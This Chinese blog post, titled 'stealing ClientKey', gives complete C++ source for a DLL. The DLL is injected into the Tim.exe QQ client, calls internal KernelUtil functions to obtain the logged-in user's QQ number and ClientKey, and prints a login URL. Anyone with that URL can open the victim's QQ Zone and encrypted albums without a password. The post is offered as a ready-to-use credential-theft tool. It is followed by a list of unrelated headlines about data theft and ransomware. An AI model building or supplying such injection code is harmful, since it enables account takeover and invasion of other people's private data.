窃取ClientKey

编译好DLL，直接注入Tim.exe，使用dbgView等工具查看输出的url，复制到任何一台电脑，使用浏览器打开这个url，就可以不需要密码进入某人的空间，查看加密相册等~

DLL源码：

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdio.h>
#include <WTypes.h>//定义CTXStringW为BSTR
typedef BSTR CTXStringW;CTXStringW AllocTXString(const wchar_t* lpSrc)
{if (lpSrc == NULL) return NULL;BYTE* bBuffer = new BYTE[16 + (wcslen(lpSrc) + 1) * 2];if (bBuffer == NULL) return NULL;DWORD dwZero = 0;DWORD dwCount = 3;DWORD dwLenth = wcslen(lpSrc) + 1;memmove(bBuffer + 0 * 4, &dwZero, 4);memmove(bBuffer + 1 * 4, &dwCount, 4);memmove(bBuffer + 2 * 4, &dwLenth, 4);memmove(bBuffer + 3 * 4, &dwLenth, 4);wcscpy((wchar_t*)(bBuffer + 4 * 4), lpSrc);return CTXStringW(bBuffer + 16);
}VOID Steal()
{do {HMODULE hKernelUtil = GetModuleHandle(L"KernelUtil.dll");if (hKernelUtil == NULL){OutputDebugStringA("Get KernelUtil Module failed \n");break;}PVOID PtrGetSelfUin = GetProcAddress(hKernelUtil, "?GetSelfUin@Contact@Util@@YAKXZ");if (PtrGetSelfUin == NULL){OutputDebugStringA("Get GetSelfUin Function failed \n");break;}DWORD uin = ((int(*)(int))PtrGetSelfUin)(1);if (uin == NULL){OutputDebugStringA("Invoke GetSelfUin Function failed \n");break;}// Print QQ numberchar szUin[MAX_PATH] = { 0 };sprintf(szUin, "%d", uin);PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z");if (GetSignature == NULL){OutputDebugStringA("Get GetSignature Function failed \n");break;}WCHAR wsBuffer[MAX_PATH] = { 0 };CTXStringW ClientKey = AllocTXString(wsBuffer);PVOID res = ((PVOID(*)(PVOID,const char*))GetSignature)(&ClientKey,"buf32ByteValueAddedSignature");if (res == NULL){OutputDebugStringA("Invoke GetSignature Function failed \n");break;}// 复制下面链接，无需密码，进入QQ空间char msg[MAX_PATH] = { 0 };sprintf(msg, "https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstar\n",szUin,ClientKey,szUin);OutputDebugStringA(msg);} while (0);}BOOL APIENTRY DllMain( HMODULE hModule,DWORD  ul_reason_for_call,LPVOID lpReserved)
{switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:Steal();break;case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;
}

窃取ClientKey相关推荐

在Chrome中打开网页时出现以下问题您的连接不是私密连接攻击者可能会试图从 x.x.x.x 窃取您的信息（例如：密码、通讯内容或信用卡信息）
现象:在Chrome中打开网页时出现以下问题您的连接不是私密连接攻击者可能会试图从 x.x.x.x 窃取您的信息(例如:密码.通讯内容或信用卡信息). 当点开"了解详情"后显示 ...
如何防止博客文章被窃取
写文章的优点: 1.整理自己的学习过程,思想心得. 2.看到自己的文章被别人转载了,心理愉悦,说明作者写的文章有价值,可以帮助他人. 缺点: 1.花费时间和精力. 2.说是抄袭别人.明明自己是原创,别 ...
新勒索软件DynA-Crypt不仅要加密你的文件，而且窃取并删除它们
本文讲的是新勒索软件DynA-Crypt不仅要加密你的文件,而且窃取并删除它们, 一个名为DynA-Crypt的新勒索软件被GData公司的恶意软件分析师Karsten Hahn发现,DynA-Cry ...
黑客用上机器学习你慌不慌？这 7 种窃取数据的新手段快来认识一下！
作者 | IrrfanAk 译者 | 天道酬勤.Carol 责编 | Carol 出品 | AI科技大本营(ID:rgznai100) 机器学习以分析大型数据集和模式识别的能力而闻名.它基本上属于人工 ...
特斯拉起诉小鹏汽车员工窃取商业机密，何小鹏回应
参加 2019 Python开发者日,请扫码咨询 ↑↑↑ 整理 | 琥珀出品 | AI科技大本营(ID:rgznai100) 3 月 21 日,外媒 TheVerge 报道称,特斯拉正针对多名前雇员 ...
AI一分钟 | 小鹏汽车回应前苹果员工窃取商业机密：积极配合相关调查
▌苹果前华人工程师涉窃密被捕,小鹏汽车回应今日(7月11日),有外媒报道称,苹果前雇员张晓浪因窃取商业机密罪被美国联邦调查局逮捕并被起,该员工即将加入小鹏汽车. 小鹏汽车的声明如下: 我们关注到 7 ...
AI一分钟 | 贾跃亭这次真的没钱了，法拉第只够发到年底工资；自动驾驶风云：Uber竟被爆料收购窃取Waymo机密的公司
图片来源:人民网一分钟AI 携程推出"机器人酒店前台" 法拉第未来前员工:公司陷入停滞,钱只够发年底前工资,在职员工干脆不去公司上班了. Uber收购的自动驾驶公司被起诉窃取Wa ...
黑客组织利用El Machete窃取全球政府超过100G数据
网络间谍活动一直是热议的话题,各类媒体不乏频现各种网络间谍活动,尤其前几年更是"炒得火热".近期,网络间谍活动又"风生水起". 黑客组织利用El Machete ...
Android后门GhostCtrl，完美控制设备任意权限并窃取用户数据
Android系统似乎已经成为世界各地病毒作者的首选目标,每天都有新的恶意软件在感染更多的设备. 这一次,安全公司趋势科技发布警告,他们发现了一个新的Android后门--GhostCtrl Ghos ...
零售行业O2O盛行或成黑客窃取数据目标
2019独角兽企业重金招聘Python工程师标准>>> O2O等新型业态为传统零售业的转型带来了巨大的机遇,但与此同时,日趋严重的数据外泄风险却在阻碍着这一转型的实现.亚信安全近期发 ...

窃取ClientKey

窃取ClientKey相关推荐

最新文章

热门文章